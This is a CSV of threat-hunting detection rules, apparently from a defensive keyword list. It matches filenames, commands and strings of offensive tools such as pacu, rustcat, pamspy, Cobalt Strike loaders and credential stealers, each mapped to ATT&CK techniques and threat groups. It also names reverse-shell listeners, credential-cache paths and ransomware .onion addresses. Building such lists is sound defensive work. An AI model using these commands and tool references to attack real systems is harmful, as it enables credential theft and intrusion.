"*packers\invobf.py*",".{0,1000}packers\\invobf\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54350" "*PacketSnifferClass1*",".{0,1000}PacketSnifferClass1.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54351" "*PackMyPayload.py*",".{0,1000}PackMyPayload\.py.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","54352" "*PackMyPayload-master*",".{0,1000}PackMyPayload\-master.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","N/A","10","10","912","143","2024-06-10T09:50:43Z","2022-02-08T19:26:28Z","54353" "*pacman -S hekatomb*",".{0,1000}pacman\s\-S\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb 
is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","54355" "*pacman -S rustcat*",".{0,1000}pacman\s\-S\srustcat.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","N/A","10","10","758","63","2024-07-20T14:20:34Z","2021-06-04T17:03:47Z","54356" "*pacu --exec *",".{0,1000}pacu\s\-\-exec\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54360" "*pacu --list-modules*",".{0,1000}pacu\s\-\-list\-modules.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54361" "*pacu --module-args=*",".{0,1000}pacu\s\-\-module\-args\=.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered 
Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54362" "*pacu --module-info*",".{0,1000}pacu\s\-\-module\-info.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54363" "*pacu --module-name *",".{0,1000}pacu\s\-\-module\-name\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54364" "*pacu --session *",".{0,1000}pacu\s\-\-session\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54365" "*pacu --set-regions *",".{0,1000}pacu\s\-\-set\-regions\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54366" "*pacu --whoami*",".{0,1000}pacu\s\-\-whoami.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework 
designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54367" "*pacu/core pacu*",".{0,1000}pacu\/core\spacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54368" "*pacu/last_update.txt*",".{0,1000}pacu\/last_update\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54369" "*pacu-master.zip*",".{0,1000}pacu\-master\.zip.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","54370" "*padlock2john.py*",".{0,1000}padlock2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54372" "*padre -u 
*http*://*",".{0,1000}padre\s\-u\s.{0,1000}http.{0,1000}\:\/\/.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","0","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","54373" "*padre-master.zip*",".{0,1000}padre\-master\.zip.{0,1000}","offensive_tool_keyword","padre","padre is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","1","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","54374" "*pamspy: Failed to increase RLIMIT_MEMLOCK limit!*",".{0,1000}pamspy\:\sFailed\sto\sincrease\sRLIMIT_MEMLOCK\slimit!.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux #content","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","54391" "*pamspy: Failed to load BPF program: *",".{0,1000}pamspy\:\sFailed\sto\sload\sBPF\sprogram\:\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux #content","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","54392" "*pamspy: Unable to find pam_get_authtok function in*",".{0,1000}pamspy\:\sUnable\sto\sfind\spam_get_authtok\sfunction\sin.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux
#content","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","54393" "*panelqbinglxczi2gqkwderfvgq6bcv5cbjwxrksjtvr5xv7ozh5wqad.onion*",".{0,1000}panelqbinglxczi2gqkwderfvgq6bcv5cbjwxrksjtvr5xv7ozh5wqad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54394" "*panix.sh --ssh-key *",".{0,1000}panix\.sh\s\-\-ssh\-key\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","54395" "*papacat -l -p *",".{0,1000}papacat\s\-l\s\-p\s.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","N/A","8","4","309","25","2024-08-21T23:10:08Z","2021-05-11T06:26:10Z","54396" "*ParamPamPam*",".{0,1000}ParamPamPam.{0,1000}","offensive_tool_keyword","ParamPamPam","This tool is used for brute discover GET and POST parameters.","T1110 - T1210 - T1211","TA0001 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Bo0oM/ParamPamPam","1","1","N/A","N/A","N/A","3","277","61","2022-06-27T11:45:19Z","2018-11-10T08:38:30Z","54397" "*paranoidninja/badger.bin*",".{0,1000}paranoidninja\/badger\.bin.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary 
Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54398" "*Parasite Invoke_.-'*",".{0,1000}\-\._\s\s\s\s\s\s\s\s\s\sParasite\sInvoke_\.\-\'.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","0","N/A","N/A","8","3","207","32","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z","54399" "*pard0p/Cordyceps*",".{0,1000}pard0p\/Cordyceps.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","N/A","10","","N/A","","","","54400" "*parrot*security.vdi*",".{0,1000}parrot.{0,1000}security\.vdi.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54403" "*parrotsec.org/download/*",".{0,1000}parrotsec\.org\/download\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. 
security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54404" "*Parrot-security-*.iso*",".{0,1000}Parrot\-security\-.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","54405" "*parse the .beacon_keys to RSA private key and public key in pem format*",".{0,1000}parse\sthe\s\.beacon_keys\sto\sRSA\sprivate\skey\sand\spublic\skey\sin\spem\sformat.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - 
APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","54406" "*parse_aggressor_properties*",".{0,1000}parse_aggressor_properties.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","54407" "*parse_nessus_file*",".{0,1000}parse_nessus_file.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","54408" "*parse_nmap_xml*",".{0,1000}parse_nmap_xml.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","54409" "*parse_shellcode*",".{0,1000}parse_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - 
TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","N/A","10","10","903","142","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z","54410" "*ParseGPPPasswordFromXml*",".{0,1000}ParseGPPPasswordFromXml.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","54411" "*ParseMSALCache*.azure\msal_token_cache.bin*",".{0,1000}ParseMSALCache.{0,1000}\.azure\\msal_token_cache\.bin.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","54412" "*ParseMSALCache*Appdata\Local\.IdentityService\msal.cache*",".{0,1000}ParseMSALCache.{0,1000}Appdata\\Local\\\.IdentityService\\msal\.cache.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","0","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","54413" "*parser.exe -a *.dmp*",".{0,1000}parser\.exe\s\-a\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","54414" "*parser.exe -a *.dmp*",".{0,1000}parser\.exe\s\-a\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","N/A","6","3","202","23","2024-11-20T15:58:21Z","2022-01-30T18:56:21Z","54415" "*PassDetective extract*",".{0,1000}PassDetective\sextract.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","54416" "*PassDetective-main.*",".{0,1000}PassDetective\-main\..{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","54417" "*passhunt.exe*",".{0,1000}passhunt\.exe.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Discovery","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","N/A","1","63","30","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z","54418" "*passhunt.exe*",".{0,1000}passhunt\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","54419" "*passhunt.py*",".{0,1000}passhunt\.py.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Discovery","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","N/A","1","63","30","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z","54420" "*passivex.asm*",".{0,1000}passivex\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54421" "*passivex.dll*",".{0,1000}passivex\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","54422" "*passphrase-rule1.rule*",".{0,1000}passphrase\-rule1\.rule.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","54423" 